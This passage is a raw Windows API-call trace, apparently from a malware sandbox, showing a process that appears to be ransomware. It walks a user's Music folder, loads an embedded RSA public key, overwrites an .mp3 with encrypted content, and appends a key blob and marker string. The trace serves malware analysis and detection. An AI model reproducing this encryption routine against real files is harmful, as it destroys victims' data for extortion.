cAlternateFileName="KDDG-2~1")) returned 1 [0097.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.205] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0097.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.206] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba6d1f0, ftCreationTime.dwHighDateTime=0x1d5bc7c, ftLastAccessTime.dwLowDateTime=0xbfcbef00, ftLastAccessTime.dwHighDateTime=0x1d5b9da, ftLastWriteTime.dwLowDateTime=0xbfcbef00, ftLastWriteTime.dwHighDateTime=0x1d5b9da, nFileSizeHigh=0x0, nFileSizeLow=0x15b7e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m1BZ9r4.mp3", cAlternateFileName="")) returned 1 [0097.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e39e8 [0097.206] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0097.206] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e39e8 | out: hHeap=0x680000) returned 1 [0097.206] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\m1BZ9r4.mp3") returned=".mp3" [0097.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\m1BZ9r4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\m1bz9r4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.206] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=88958) returned 1 [0097.206] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.210] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15b58, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.210] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.211] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.211] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.211] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.211] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x15b7e, lpOverlapped=0x0) returned 1 [0097.212] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.212] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.212] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.212] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.212] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.213] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.213] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.213] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.213] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.213] GetLastError () returned 0x0 [0097.213] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.213] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.213] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.213] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.213] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.213] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.213] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x15b80) returned 0x9a06a00 [0097.214] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.214] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03290 [0097.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4cd0 [0097.214] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a032d8 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ce8 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d18 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d30 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.215] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d18 | out: hHeap=0x680000) returned 1 [0097.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d30 | out: hHeap=0x680000) returned 1 [0097.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4d30 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4d18 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.215] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d30 | out: hHeap=0x680000) returned 1 [0097.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d18 | out: hHeap=0x680000) returned 1 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.216] GetCurrentThreadId () returned 0x8c4 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f92f0 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.216] GetCurrentThreadId () returned 0x8c4 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.216] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.216] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.217] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d18 [0097.217] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.217] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d30 [0097.217] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.217] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d00 [0097.217] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.217] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4d48 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d18 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d18 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d18 | out: hHeap=0x680000) returned 1 [0097.218] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.219] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d48 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d30 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d00 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ce8 | out: hHeap=0x680000) returned 1 [0097.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a032d8 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.220] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x15b79, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x15b79, lpOverlapped=0x0) returned 1 [0097.220] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.220] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15b7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.221] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.221] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.221] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.221] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.221] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.221] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.221] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.221] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.221] HeapFree 